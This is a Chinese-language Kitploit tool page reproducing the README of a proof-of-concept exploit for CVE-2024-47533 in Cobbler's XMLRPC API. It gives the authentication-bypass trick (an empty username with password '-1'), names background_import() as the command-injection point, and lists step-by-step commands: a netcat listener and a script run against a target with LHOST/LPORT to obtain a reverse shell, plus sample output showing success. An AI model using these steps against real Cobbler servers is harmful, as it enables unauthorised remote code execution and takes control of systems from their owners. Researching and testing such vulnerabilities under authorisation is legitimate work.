Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-47533-PoC — 针对CVE-2024-47533的概念验证漏洞利用,这是Cobbler的XMLRPC API中的未认证身份验证绕过,通过注入反向shell导致远程代码执行。 | Kitploit
工具/GitHubGitHub/00xcanelo/cve-2024-47533-poc
身份验证与授权漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHub00xcanelo/cve-2024-47533-poc

CVE-2024-47533-PoC

针对CVE-2024-47533的概念验证漏洞利用,这是Cobbler的XMLRPC API中的未认证身份验证绕过,通过注入反向shell导致远程代码执行。

查看仓库
131年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-47533 – Cobbler XMLRPC 认证绕过 → 反向 Shell(未授权 RCE)

📌 摘要

本仓库包含 CVE-2024-47533 的 概念验证(PoC)漏洞利用代码,
该漏洞是 Cobbler XMLRPC API 中的一个严重认证绕过漏洞,可导致 未授权远程代码执行(RCE)。

漏洞利用程序通过 XMLRPC API 的 login() 方法缺陷绕过认证,并借助 background_import() 注入反向 Shell 命令。


⚠️ 免责声明

此工具仅用于 教育、研究及授权的渗透测试。
请 勿 在未拥有或未经明确书面许可的系统上使用。
作者对滥用或造成的损害 不承担任何责任。


🛠 技术细节

  • 漏洞类型: 认证绕过 → RCE
  • 受影响组件: Cobbler XMLRPC API
  • 攻击向量: 网络
  • 所需权限: 无
  • 用户交互: 无

根因:
utils.get_shared_secret() 由于在二进制模式下读取文件并使用了编码,错误地返回 -1,从而允许使用空用户名和 -1 作为密码进行认证。

影响:
攻击者可以:

  • 获取管理员级别的 API 访问权限
  • 向 Cobbler 模板注入任意系统命令
  • 在目标上生成反向 Shell

🚀 使用方法

1️⃣ 克隆仓库

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC

2️⃣ 设置监听器

在攻击机上:

root@kitploit:~
nc -lvnp 4444

3️⃣ 运行漏洞利用程序

root@kitploit:~
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>

示例:

root@kitploit:~
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444

📂 文件结构

root@kitploit:~
.
├── CVE-2024-47533.py  # 反向 Shell 漏洞利用脚本
└── README.md          # 文档

📸 示例输出

root@kitploit:~
[*] 目标:http://192.168.1.50:25151/RPC2
[*] 监听器:192.168.1.100:4444
[*] 载荷:bash
[*] 正在连接 Cobbler...
[*] 正在认证...
[*] 正在执行漏洞利用...
[+] 漏洞利用已发送!获取到 Shell 🔥。

🧑‍💻 作者

00xCanelo
GitHub 主页


📚 参考资料

  • NVD: CVE-2024-47533
  • Cobbler 项目 GitHub
下载工具